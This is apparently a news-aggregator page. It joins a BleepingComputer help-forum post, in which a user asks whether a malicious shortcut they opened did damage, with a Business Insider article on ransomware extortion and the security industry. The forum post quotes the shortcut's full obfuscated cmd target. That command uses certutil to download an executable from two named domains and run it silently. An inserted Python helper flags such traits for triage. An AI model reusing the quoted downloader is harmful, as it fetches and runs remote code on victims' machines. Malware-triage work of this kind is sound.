Featured Post

.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Posted: 06 Jul 2020 11:33 AM PDT

Hi all,

Looking for feedback on the likelihood my double clicking of a bad .lnk file caused damage. When I did double click it, I remember getting a standard Windows dialog box. I believe it said the path did not exist or shortcut unavailable. I'm not finding anything in my startup folder for C:\programdata or my username appdata startup folder... I ran scans with Malwarebytes, Hitman with no results.

The .lnk file target was:

%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1

The .lnk file 'start-in' was:

"%APPDATA%\Mic…
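Added example (not part of the original post, and not BleepingComputer's own tooling): a Python triage helper that checks a shortcut target string for the traits visible in the target quoted above (command interpreter, /v:on delayed expansion, certutil -urlcache, suppressed output) and resolves !NAME! variables so the assembled command can be read. The function names, the simplified expansion model and the sample strings are assumptions made for illustration.

```python
import re

# Traits visible in the shortcut target quoted in the post above.
TRAITS = {
    "cmd_interpreter": re.compile(r"%comspec%|\bcmd(\.exe)?\s", re.I),
    "delayed_expansion": re.compile(r"/v:on", re.I),
    "certutil_urlcache": re.compile(r"certutil(\.exe)?\s+-urlcache", re.I),
    "output_suppressed": re.compile(r">\s*nul\s+2>&1", re.I),
}
VAR = re.compile(r"!(\w+)!")                              # delayed-expansion reference
SET = re.compile(r"(?:^|[(\s])set\s+(\w+)=(.*)$", re.I)   # SET NAME=value
SPLIT = re.compile(r"(?<![&|>])&(?!&)")                   # single '&', not '>&' or '&&'


def resolve(target):
    """Simplified model of cmd delayed expansion (an assumption, not cmd's
    full parser): process '&'-separated commands left to right, substitute
    !NAME! with the value set so far (undefined names become empty), consume
    SET commands, and return the remaining commands with variables resolved."""
    env, rest = {}, []
    for part in SPLIT.split(target):
        part = VAR.sub(lambda m: env.get(m.group(1).upper(), ""), part)
        m = SET.search(part)
        if m:
            env[m.group(1).upper()] = m.group(2)
        elif part.strip():
            rest.append(part.strip())
    return rest


def triage(target):
    """Return (sorted trait names, resolved commands) for one target string."""
    resolved = resolve(target)
    text = target + " " + " ".join(resolved)   # check raw and resolved forms
    hits = sorted(name for name, rx in TRAITS.items() if rx.search(text))
    return hits, resolved


# Constructed samples, not taken from the post; example.invalid is a reserved name.
SUSPECT = ("%ComSpec% /v:on/c(SET P=/a.bin&SET D=certutil -urlcache -f https://"
           "&!D!example.invalid!P!)>nul 2>&1")
BENIGN = r'"C:\Program Files\Editor\editor.exe" --new-window'

if __name__ == "__main__":
    for label, sample in (("suspect", SUSPECT), ("benign", BENIGN)):
        hits, resolved = triage(sample)
        print(label, hits, resolved, sep="\n  ")
```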

Cybersecurity is changing to address high-profile ransomware attacks - Business Insider


Posted: 16 May 2020 12:00 AM PDT

  • Extortion ransomware is the high-profile leaking of stolen documents pressuring victims to pay to get them returned. 
  • The leaking of Lady Gaga's documents this week – coupled with a dump on Saturday of legal documents mentioning President Trump – raises the profile of a crime spree reshaping the cybersecurity industry.
  • Startups including $1 billion KnowBe4, which pulled in a $300 million investment in June, are offering training and data backup to address ransomware.
  • Older companies like Kaspersky and Sophos have upgraded their enterprise tools and led new efforts to address the threat.   

A cybergang hacked into top entertainment law firm Grubman Shire Meiselas & Sacks this week and spilled confidential documents related to two of the most famous people in the world, taking the high-profile cybercrime of ransomware to its brightest spotlight yet – and challenging the cybersecurity industry.

On Thursday the gang dumped thousands of pop superstar Lady Gaga's contracts and financial records, exposing confidential data ranging from her dancers' Social Security numbers to how much she charged for a private concert. On Saturday the hackers dumped hundreds of the law firm's emails and documents that mention President Trump, claiming the documents were "the first part, with the most harmless information," and more data dumps are to come.   

The attack on the law firm, which confirmed the hack in a statement and said it would not pay the ransom, is the latest in a string of cyberattacks coupled with highly publicized blackmail that challenge the cybersecurity industry, pushing traditional companies to produce new enterprise products, and startups to innovate with artificial intelligence and other new approaches.

Ransomware attacks are both one of the most common and most costly cybercrimes: Three-quarters of a million ransomware attacks happened last year, with an average cost of nearly $1.4 million when victims pay, researchers say. These attacks have hit cities, hospitals, Fortune 500 firms, and now, via the law firm hack, pop stars.  

"Old approaches to extortion ransomware don't work," says threat analyst Brett Callow of the New Zealand firm Emsisoft, which specializes in ransomware defense and recovery. "Data exfiltration has completely changed the landscape, with companies' data being weaponized and used against them. Criminals have turned up the heat, and threats keep advancing."

It's not just the threat of having personal or professional secrets exposed, either. Sean Gallagher, a researcher at cybersecurity firm Sophos, notes that these kinds of attacks leave companies exposed to fines under Europe's General Data Protection Regulation (GDPR), which can cost firms that experience data breaches up to 4% of their annual revenue. "These can be business-ending attacks," Gallagher said. 

How ransomware works

Attacks often begin with an email. An employee clicks on a link or downloads an attachment, and unwittingly unlocks ransomware that spreads throughout a company's network. The malware encrypts the organization's data, often paralyzing its online operations. 

A panicked victim is then presented with a dilemma: Pay a ransom in bitcoin and receive a "key" to supposedly release your data – or refuse to pay, and languish as the data remains locked up. The keys often don't work, or don't work well. So payment doesn't free the victim, but does embolden the captor, experts say. Still, victims on the spot often pay – more than a quarter of the time, new research shows. When their documents are publicly leaked, the pressure mounts considerably. 

Research from Sophos shows that over half the companies in many industries have been hit by this crime in the last year or so:

[Figure: Sophos research shows which industries were hit hardest by ransomware last year. Source: Sophos]

Kaspersky Lab, the major Russian cybersecurity company, offers advice to stop ransomware that can be summed up as: Never click on unverified links or download untrusted attachments, make sure you have current data backups close at hand, and install the latest security patches for your operating system. And if you or your company are hit, never pay the ransom — report the crime to your local law enforcement agency or the FBI, instead. Many victims don't do this, because their attackers threaten them. This encourages more ransomware attacks and makes prosecution of criminals extremely difficult. 

A new push to stop ransomware

Big security companies in the past classified ransomware with other forms of malware that they argued could be stopped with their existing antivirus, network security (which cover shared company assets), and endpoint products (which cover employees' devices). That hasn't proven to be the case, though, as it's become clear that ransomware requires a different approach.

Today McAfee, Trend Micro, Bitdefender, Avast, and others have products specifically designed to address ransomware, and some of them provide services to victims after an attack, by trying to decrypt their data and free their systems.  

A few companies have done more. Kaspersky Lab, which sells enterprise tools to block ransomware, has emerged as one of the new leaders in the fight against ransomware by leading an industry coalition that gives companies free tools to unlock computer systems criminals have seized. Sophos, which offers an artificial-intelligence product called Intercept X that automatically detects new strains of ransomware, produced a report on ransomware last week that polled 5,000 security professionals in 26 countries.

And the quirky 40-employee New Zealand firm Emsisoft, a private company founded in 2003, has specialized in ransomware for years, providing many free decryption tools – and boasting a genius cryptographer in hiding from the criminals he frustrated so many times they threaten his life. Callow, the threat researcher quoted above, and the rest of Emsisoft also tirelessly preach that companies must practice good security hygiene to defend against attacks.  

Fighting back provides investment opportunity

The rise in ransomware has led to opportunity for more niche players to enter the ring, too.

For instance, research shows around half of employees don't know how to handle the sudden computer system paralysis and ominous threats of a ransomware attack, and ransomware training is a booming industry.

Florida unicorn startup KnowBe4, which pulled in a $300 million investment in June to take its valuation over $1 billion, offers 18 different ransomware simulations to its customers. Similarly, SiteLock, a startup acquired by the ABRY Partners private equity firm in 2018, offers ransomware training for remote employees.

Data recovery, which allows organizations hit with ransomware to activate backup copies of their files and carry on operations, is a key area of defense – and an investing opportunity. "I do tend to view recovery as an opportunity for innovation," says Josh Zelonis, a principal analyst at Forrester who focuses on cybersecurity. "I also know a lot of backup vendors are hungry to get into this space."

Fast-growing 10-year-old San Francisco startup Scality, which provides data recovery for ransomware attacks, has raised more than $150 million in venture capital from investors including Menlo Ventures. Silicon Valley competitor Cloudian has raised around $175 million, including a $94 million round a year ago.  

Cybereason, a Boston startup that brought in $200 million in funding from Japan's SoftBank in August, detects ransomware and blocks attempts to encrypt files. ITsMine, an Israeli startup, automatically protects a company's data from external threats without interrupting workers. Deep Instinct, a New York startup that raised $43 million in February, uses deep learning and predictive analytics – artificial intelligence that learns how threats evolve and anticipates changes – to prevent ransomware from executing. 

Celebrity attack raises awareness of crime to new heights

For as much as the cybersecurity companies are hustling to defend against ransomware, the bad guys aren't sleeping, either.

It seems likely that ransomware gangs will present the same kind of threat as bank robbers during the 1930s, when Bonnie and Clyde, Pretty Boy Floyd, and Baby Face Nelson made headlines and newsreels with their latest exploits. The ransomware gangs Maze, REvil (who carried out the celebrity hack), Doppelpaymer and others are chasing the same kind of brazen notoriety by publicly leaking documents and taunting targets, who now include the president. 

The leaked documents published by ransomware gangs can be startling. There is currently a document posted on one of the ransomware gangs' websites that documents sites of weapons of mass destruction, with a maintenance schedule. Past leaked documents have included a missile schematic, fundraising letters from President Trump, and the names and contact information for sufferers of eating disorders. The more delicate the information, the more pressure on victims to pay up fast, Emsisoft wrote in a December State of Ransomware report.

But this celebrity hack shows how these criminals are going after ever-larger game — and building themselves pop star-sized reputations, too. The documents will doubtlessly continue to draw attention until the situation is resolved, experts say. 

Rolling Stone and other publications reported that the law firm said in a statement "Cyberterrorists have hacked into our network and are demanding $42 million as ransom. We are working directly with federal law enforcement." The statement suggested the law firm would not pay, so the document leaks of the famous clients' data could continue. "We have been informed by the experts and the FBI that negotiating with or paying ransom to terrorists is a violation of federal criminal law." The White House and Lady Gaga's representation did not immediately respond to a request for comment. 

The celebrity hack turns up the heat on victims and promotes the criminals' reputation, experts said.  

"Hacking something everyday people have an interest in helps criminals get the word out to a wide audience that they are not to be messed with," says Chester Wisniewski, principal research scientist at Sophos.
